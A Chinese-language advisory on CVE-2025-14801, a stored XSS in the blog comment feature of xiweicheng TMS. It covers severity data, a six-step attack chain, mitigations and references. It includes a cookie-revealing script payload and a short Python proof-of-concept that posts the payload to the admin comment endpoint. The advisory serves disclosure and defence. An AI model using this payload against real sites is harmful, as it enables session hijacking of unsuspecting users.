CVE-2025-14801 xiweicheng TMS存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14801

漏洞类型

XSS跨站脚本攻击

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

xiweicheng TMS

漏洞概述

CVE-2025-14801是xiweicheng TMS系统中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于博客评论功能模块中，具体位于/admin/blog/comment/create端点的createComment函数。由于系统对用户提交的评论内容（content参数）缺乏充分的输入验证和输出编码，攻击者可以在评论中嵌入恶意JavaScript代码。当其他用户或管理员查看该评论时，恶意脚本将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取、网页篡改等安全问题。由于该漏洞需要高权限用户才能利用（PR:H），且需要用户交互（UI:R），CVSS评分仅为2.4，属于低危漏洞。然而，即使评分较低，存储型XSS漏洞仍可能对系统安全性造成实质威胁，特别是在管理后台被利用时可能影响整个系统的安全性。该漏洞已于2025年12月17日公开披露，厂商在收到通知后未做出任何回应。

技术细节

该漏洞为存储型XSS（Stored Cross-Site Scripting），发生在xiweicheng TMS的博客评论功能模块。攻击者通过向/admin/blog/comment/create端点发送恶意构造的请求，在content参数中注入JavaScript代码。由于系统未对用户输入进行适当的安全过滤和HTML实体编码，恶意脚本被存储在数据库中。当其他用户访问包含该评论的页面时，服务器从数据库读取并返回未经过滤的内容，浏览器将其解析为HTML并执行其中的JavaScript代码。攻击者可利用此漏洞窃取用户会话Cookie、进行钓鱼攻击、篡改页面内容或执行其他客户端操作。由于漏洞需要高权限账户（PR:H）才能利用，攻击场景相对受限，但管理员账户一旦被攻击，可能导致整个管理系统沦陷。漏洞影响xiweicheng TMS 2.28.0及以下版本。

攻击链分析

STEP 1

步骤1

攻击者获取xiweicheng TMS的高权限账户（如管理员或内容编辑者权限）

STEP 2

步骤2

攻击者构造恶意XSS payload：<script>alert(document.cookie)</script>

STEP 3

步骤3

通过POST请求向/admin/blog/comment/create端点提交恶意评论内容

STEP 4

步骤4

服务器将恶意脚本未经过滤存储到数据库中

STEP 5

步骤5

其他用户或管理员访问博客评论页面时，服务器返回包含恶意脚本的页面

STEP 6

步骤6

受害者浏览器执行恶意JavaScript代码，导致Cookie窃取或会话劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14801 PoC - Stored XSS in xiweicheng TMS
# Affected: xiweicheng TMS <= 2.28.0
# Endpoint: POST /admin/blog/comment/create
# Vulnerability: XSS via content parameter

import requests
import json

target_url = "http://target.com/admin/blog/comment/create"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

# Cookie for authenticated high-privilege user
cookies = {
    "session_id": "your_admin_session_cookie"
}

# POST data with XSS payload
data = {
    "content": xss_payload,
    "blog_id": 1,
    # Additional required parameters may be needed
}

response = requests.post(target_url, data=data, cookies=cookies)

if response.status_code == 200:
    print("[+] XSS payload submitted successfully")
    print("[+] Payload will execute when comment is viewed")
else:
    print("[-] Request failed")

影响范围

xiweicheng TMS <= 2.28.0

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时措施：1) 限制博客评论功能的访问权限，仅允许受信任用户使用；2) 在Web应用防火墙（WAF）层面配置XSS防护规则，对评论内容进行过滤；3) 禁用评论模块直到漏洞修复；4) 加强管理员账户安全，使用强密码和双因素认证；5) 监控日志中的异常请求模式；6) 考虑在反向代理层对用户输入进行HTML标签过滤。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14801
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14801
3 Details https://www.cvedetails.com/cve/CVE-2025-14801/
4 VulDB https://vuldb.com/cve/CVE-2025-14801
5 Link https://github.com/ha1yu-Yiqiyin/warehouse/blob/main/TMS_v2.28.0_XSS-1.md
6 Link https://vuldb.com/?ctiid.336939
7 Link https://vuldb.com/?id.336939
8 Link https://vuldb.com/?submit.708322